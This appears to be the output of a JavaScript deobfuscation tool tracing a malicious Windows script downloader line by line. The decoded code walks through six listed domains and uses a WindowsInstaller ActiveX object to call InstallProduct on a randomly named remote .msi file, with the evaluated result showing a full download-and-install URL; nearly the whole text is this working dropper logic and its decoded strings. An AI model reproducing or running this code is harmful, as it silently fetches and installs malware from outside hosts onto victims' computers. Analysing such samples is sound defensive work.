                                                                                                                                                                                                                                                                • "garokelka.com\x7flakirasa.com\x7ftofinka.com\x7fkoriska.com\x7fretrenia.com\x7fgurakis.com\x7flength\x7fwindowsinstaller.installer\x7fsubstring\x7ftoString\x7frandom\x7fhttps://\x7f/\x7f.msi\x7fInstallProduct".split("#0") ➔ garokelka.com\x7flakirasa.com\x7ftofinka.com\x7fkoriska.com\x7fretrenia.com\x7fgurakis.com\x7flength\x7fwindowsinstaller.installer\x7fsubstring\x7ftoString\x7frandom\x7fhttps://\x7f/\x7f.msi\x7fInstallProduct
                                                                                                                                                                                                                                                                • garokelka.com\x7flakirasa.com\x7ftofinka.com\x7fkoriska.com\x7fretrenia.com\x7fgurakis.com\x7flength\x7fwindowsinstaller.installer\x7fsubstring\x7ftoString\x7frandom\x7fhttps://\x7f/\x7f.msi\x7fInstallProduct.join("#") ➔ "garokelka.com\x7flakirasa.com\x7ftofinka.com\x7fkoriska.com\x7fretrenia.com\x7fgurakis.com\x7flength\x7fwindowsinstaller.installer\x7fsubstring\x7ftoString\x7frandom\x7fhttps://\x7f/\x7f.msi\x7fInstallProduct"
                                                                                                                                                                                                                                                                • "garokelka.com\x7flakirasa.com\x7ftofinka.com\x7fkoriska.com\x7fretrenia.com\x7fgurakis.com\x7flength\x7fwindowsinstaller.installer\x7fsubstring\x7ftoString\x7frandom\x7fhttps://\x7f/\x7f.msi\x7fInstallProduct".split("\x7f") ➔ garokelka.com,lakirasa.com,tofinka.com,koriska.com,retrenia.com,gurakis.com,length,windowsinstaller.installer,substring,toString,random,https://,/,.msi,InstallProduct
                                                                                                                                                                                                                                                                28
                                                                                                                                                                                                                                                                } ) ( ".asowkadeetoi%krtirSlanceo/tntciiaacrnl.l%seds%cocrrgiPk%im.tmnmolaimulmbrfone.aw%%tlnss:sko%sctaagtr%mosol.r%u/asargtgnioatu.ahiorndse%skoplIihr/%.m%t%k.nomlinrgck%t", 4527110 );
                                                                                                                                                                                                                                                                  29
                                                                                                                                                                                                                                                                  var sites = [ _$_cdc5[0], _$_cdc5[1], _$_cdc5[2], _$_cdc5[3], _$_cdc5[4], _$_cdc5[5] ];
                                                                                                                                                                                                                                                                    30
                                                                                                                                                                                                                                                                    for ( var i = 0 ; i < sites[_$_cdc5[6]] ; i ++ )
                                                                                                                                                                                                                                                                      31
                                                                                                                                                                                                                                                                      {
                                                                                                                                                                                                                                                                        32
                                                                                                                                                                                                                                                                        try
                                                                                                                                                                                                                                                                          33
                                                                                                                                                                                                                                                                          {
                                                                                                                                                                                                                                                                            34
                                                                                                                                                                                                                                                                            var obj = new ActiveXObject ( _$_cdc5[7] );
                                                                                                                                                                                                                                                                              35
                                                                                                                                                                                                                                                                              var path = ( Math[_$_cdc5[10]] ( ) + 1 )[_$_cdc5[9]] ( 36 ) [_$_cdc5[8]] ( 7 );
                                                                                                                                                                                                                                                                              • [object Math].random() ➔ 0.38760505984176774
                                                                                                                                                                                                                                                                              • "1.dyc3nrlvoq0".substring(7) ➔ "rlvoq0"
                                                                                                                                                                                                                                                                              36
                                                                                                                                                                                                                                                                              obj[_$_cdc5[14]] ( _$_cdc5[11] + sites[i] + _$_cdc5[12] + path + _$_cdc5[13] );
                                                                                                                                                                                                                                                                              • InstallProduct("https://garokelka.com/rlvoq0.msi") ➔ undefined
                                                                                                                                                                                                                                                                              37
                                                                                                                                                                                                                                                                              break ;
                                                                                                                                                                                                                                                                                38
                                                                                                                                                                                                                                                                                }
                                                                                                                                                                                                                                                                                  39
                                                                                                                                                                                                                                                                                  catch ( err )
                                                                                                                                                                                                                                                                                    40
                                                                                                                                                                                                                                                                                    {
                                                                                                                                                                                                                                                                                      41
                                                                                                                                                                                                                                                                                      }
                                                                                                                                                                                                                                                                                        42
                                                                                                                                                                                                                                                                                        }
                                                                                                                                                                                                                                                                                          Reset < >